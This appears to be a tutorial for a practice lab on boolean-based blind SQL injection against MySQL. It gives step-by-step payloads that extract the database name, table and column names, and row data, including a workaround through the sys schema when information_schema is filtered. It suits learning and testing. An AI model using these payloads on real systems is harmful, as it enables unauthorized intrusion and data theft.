Commonly used functions

substr(str,from,length)
Returns the substring of str of length `length` starting at position from. Positions start at 1, not 0.
length(str)
Returns the length of the string.
ASCII(char)
Returns the ASCII code of char. Usually combined with substr: comparing ascii(substr(...)) against a number lets you binary-search the character instead of testing every letter in turn, and it is not affected by case-insensitive collations.
Injection steps
Submit an id to query. A successful query returns success (shown in green); a failed one returns error (shown in red). Every payload below turns that difference into one yes/no answer about the database.
1. Find the length of the database name
?id=1 and length(database())=i
#i is the guessed length; increase it until the page returns success
2. Extract the database name
?id=1 and substr(database(),j,1)='a'
...
?id=1 and substr(database(),j,1)='z'
#once the character at position j is found, move j forward by 1 until the length i found in step 1 is reached
#with MySQL's default case-insensitive collations 'a' also matches 'A'; compare ascii(substr(database(),j,1)) against a number when case matters
3. Find the number of tables in the current database
?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())=k
#k is the number of tables
When information_schema is filtered, use the sys schema instead
- The sys schema was added in MySQL 5.7. Its views are built on performance_schema and information_schema; the sys database stores no data of its own.
?id=1 and (select COUNT(*) from sys.schema_auto_increment_columns where table_schema=database())=k
#or
?id=1 and (select COUNT(*) from sys.schema_table_statistics_with_buffer where table_schema=database())=k
#caveat: schema_auto_increment_columns lists only tables that have an AUTO_INCREMENT column, and schema_table_statistics_with_buffer only tables that appear in performance_schema's table I/O statistics, so k can be smaller than the real table count; reading sys also requires SELECT privilege on it
4. Find the length of a table name
?id=1 and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=m
#m is the table name length
#limit 0,1 takes one table starting at offset 0; use limit 1,1, limit 2,1, ... for the others
- limit usage
limit a,b returns b rows starting at offset a (offsets start at 0)
5. Extract the table name
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a'
...
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),m,1)='z'
#walk positions 1 to m, testing each against a..z (and digits or '_' if the name contains them); the other tables are handled the same way with a different limit offset
6. Find the number of columns in a table
?id=1 and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name='table_name')=n
#n columns in total
7. Find the length of a column name
?id=1 and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='table_name' limit 0,1)=v
#v is the column name length; limit 0,1 is required here, otherwise the subquery returns one row per column and the whole query errors out. table_schema=database() keeps same-named tables in other databases from polluting the result
8. Extract the column name
?id=1 and substr((select column_name from information_schema.columns where table_schema=database() and table_name='table_name' limit 0,1),1,1)='a'
...
?id=1 and substr((select column_name from information_schema.columns where table_schema=database() and table_name='table_name' limit 0,1),v,1)='z'
#same as step 5: walk positions 1 to v, then move the limit offset to the next column
9. Extract the data
?id=1 and substr((select column_name from table_name limit 0,1),1,1)='a'
...
?id=1 and substr((select column_name from table_name limit 0,1),w,1)='z'
#first find the value length with length((select column_name from table_name limit 0,1))=w as in step 7, then walk positions 1 to w; limit 0,1 is again required so the subquery yields a single row, and raising the offset reads the following rows